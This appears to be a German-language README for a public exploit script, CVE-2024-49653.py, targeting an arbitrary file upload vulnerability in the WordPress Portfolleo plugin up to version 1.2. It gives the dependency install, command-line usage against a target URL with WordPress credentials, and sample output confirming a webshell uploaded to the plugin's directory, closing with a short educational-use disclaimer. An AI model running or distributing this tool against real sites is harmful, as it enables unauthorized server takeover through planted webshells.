
WordPress Portfolleo Plugin <= 1.2 - Schwachstelle für beliebigen Datei-Upload
Titel: WordPress Portfolleo Plugin <= 1.2 – Schwachstelle für beliebiges Datei-Upload
Beschreibung:
Uneingeschränkter Upload von Dateien mit gefährlichem Typ im James Eggers Portfolleo portfolleo erlaubt das Hochladen eines Webshells auf einen Webserver. Dieses Problem betrifft Portfolleo von Version n/a bis 1.2.
Mehr erfahren:
CVSS-Score:
Dieses Skript nutzt die Schwachstelle für beliebiges Datei-Upload im WordPress Portfolleo Plugin (Versionen <= 1.2) aus, um einen Webshell hochzuladen.
Sie müssen Folgendes installiert haben, um das Skript auszuführen:
requests-Bibliothekbeautifulsoup4-BibliothekSie können die erforderlichen Bibliotheken mit folgendem Befehl installieren:
pip install requests beautifulsoup4
Führen Sie das Skript mit den folgenden Optionen aus:
CVE-2024-49653.py [-h] -u URL -U USERNAME -p PASSWORD
WordPress Portfolleo Plugin <= 1.2 – Schwachstelle für beliebiges Datei-Upload # von Khaled Alenazi
Optionen:
-h, --help Zeigt diese Hilfemeldung an und beendet das Programm
-u, --url URL Basis-URL der Website (z. B. http://target/wordpress)
-U, --username USERNAME
WordPress-Benutzername
-p, --password PASSWORD
WordPress-Passwort
python CVE-2024-49653.py -u http://target/wordpress.com -U Nxploited -p password123
Wenn das Skript erfolgreich ausgeführt wird, sollten Sie die folgende Ausgabe sehen:
[+] Erfolgreich angemeldet.
[+] _wpnonce extrahiert: e5f7ffa134
[+] Shell wurde hochgeladen.
[*] Überprüfen Sie die Shell hier: http://target.com/wp-content/portfolleo/nxploit.php
Dieses Skript ist nur für Bildungszwecke bestimmt. Der Autor befürwortet nicht die Nutzung dieses Skripts für illegale Aktivitäten. Verwenden Sie es verantwortungsbewusst und nur auf Systemen, für die Sie ausdrückliche Erlaubnis zum Testen haben.
Von: Nxploited | Khaled Alenazi